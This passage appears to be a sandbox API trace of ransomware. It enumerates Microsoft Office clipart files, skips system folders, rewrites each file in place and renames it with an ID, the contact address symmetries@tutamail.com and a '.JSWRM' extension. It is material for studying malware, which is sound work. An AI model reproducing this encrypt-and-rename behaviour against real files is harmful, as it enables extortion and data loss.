lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0092.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0092.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0092.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0092.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0092.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.524] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02405_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02405_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02405_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02405_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0092.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0092.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.525] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b584f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6b584f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6b584f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fc8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02407_.WMF", cAlternateFileName="")) returned 1 [0092.525] lstrcmpiW (lpString1="NA02407_.WMF", lpString2=".") returned 1 [0092.525] lstrcmpiW (lpString1="NA02407_.WMF", lpString2="..") returned 1 [0092.525] lstrcmpiW (lpString1="NA02407_.WMF", lpString2="...") returned 1 [0092.525] lstrcmpiW (lpString1="NA02407_.WMF", lpString2="windows") returned -1 [0092.525] lstrcmpiW (lpString1="NA02407_.WMF", lpString2="recovery") returned -1 [0092.525] lstrcmpiW (lpString1="NA02407_.WMF", lpString2="perflogs") returned -1 [0092.525] lstrcmpiW (lpString1="NA02407_.WMF", lpString2="documents and settings") returned 1 [0092.525] lstrcmpiW (lpString1="NA02407_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.525] lstrcmpiW (lpString1="NA02407_.WMF", lpString2="system volume information") returned -1 [0092.525] lstrcmpiW (lpString1="NA02407_.WMF", lpString2="msocache") returned 1 [0092.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02407_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02407_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02407_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0092.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02407_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02407_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02407_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0092.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0092.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0092.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0092.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02407_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02407_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.527] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8136) returned 1 [0092.527] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1fc0) returned 0x205850 [0092.527] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1fc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1fc0, lpOverlapped=0x0) returned 1 [0092.529] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.529] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1fc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1fc0, lpOverlapped=0x0) returned 1 [0092.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.529] CloseHandle (hObject=0x314) returned 1 [0092.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0092.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0092.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0092.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0092.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0092.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0092.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.530] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02407_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02407_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02407_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02407_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0092.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0092.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0092.530] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b584f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6b584f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6b584f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28ec, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02413_.WMF", cAlternateFileName="")) returned 1 [0092.530] lstrcmpiW (lpString1="NA02413_.WMF", lpString2=".") returned 1 [0092.530] lstrcmpiW (lpString1="NA02413_.WMF", lpString2="..") returned 1 [0092.531] lstrcmpiW (lpString1="NA02413_.WMF", lpString2="...") returned 1 [0092.531] lstrcmpiW (lpString1="NA02413_.WMF", lpString2="windows") returned -1 [0092.531] lstrcmpiW (lpString1="NA02413_.WMF", lpString2="recovery") returned -1 [0092.531] lstrcmpiW (lpString1="NA02413_.WMF", lpString2="perflogs") returned -1 [0092.531] lstrcmpiW (lpString1="NA02413_.WMF", lpString2="documents and settings") returned 1 [0092.531] lstrcmpiW (lpString1="NA02413_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.531] lstrcmpiW (lpString1="NA02413_.WMF", lpString2="system volume information") returned -1 [0092.531] lstrcmpiW (lpString1="NA02413_.WMF", lpString2="msocache") returned 1 [0092.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0092.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02413_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02413_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02413_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0092.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0092.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02413_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02413_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02413_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0092.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0092.531] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0092.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.531] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.531] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0092.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02413_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.532] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10476) returned 1 [0092.532] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x28e0) returned 0x24d210 [0092.532] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x28e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x28e0, lpOverlapped=0x0) returned 1 [0092.534] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.534] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x28e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x28e0, lpOverlapped=0x0) returned 1 [0092.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.534] CloseHandle (hObject=0x314) returned 1 [0092.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0092.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0092.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0092.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0092.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0092.535] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0092.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0092.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0092.535] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02413_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02413_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02413_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02413_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0092.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0092.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0092.536] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b584f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6b584f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6b584f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb24, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02417_.WMF", cAlternateFileName="")) returned 1 [0092.536] lstrcmpiW (lpString1="NA02417_.WMF", lpString2=".") returned 1 [0092.536] lstrcmpiW (lpString1="NA02417_.WMF", lpString2="..") returned 1 [0092.536] lstrcmpiW (lpString1="NA02417_.WMF", lpString2="...") returned 1 [0092.536] lstrcmpiW (lpString1="NA02417_.WMF", lpString2="windows") returned -1 [0092.536] lstrcmpiW (lpString1="NA02417_.WMF", lpString2="recovery") returned -1 [0092.536] lstrcmpiW (lpString1="NA02417_.WMF", lpString2="perflogs") returned -1 [0092.536] lstrcmpiW (lpString1="NA02417_.WMF", lpString2="documents and settings") returned 1 [0092.536] lstrcmpiW (lpString1="NA02417_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.536] lstrcmpiW (lpString1="NA02417_.WMF", lpString2="system volume information") returned -1 [0092.536] lstrcmpiW (lpString1="NA02417_.WMF", lpString2="msocache") returned 1 [0092.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0092.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02417_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02417_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02417_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0092.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0092.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02417_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02417_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02417_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0092.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0092.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0092.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0092.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02417_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02417_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.537] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2852) returned 1 [0092.537] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.537] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb20) returned 0x23fc98 [0092.537] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xb20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xb20, lpOverlapped=0x0) returned 1 [0092.539] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.539] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xb20, lpOverlapped=0x0) returned 1 [0092.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.539] CloseHandle (hObject=0x314) returned 1 [0092.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0092.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0092.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0092.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0092.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0092.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0092.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.539] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02417_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02417_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02417_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02417_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 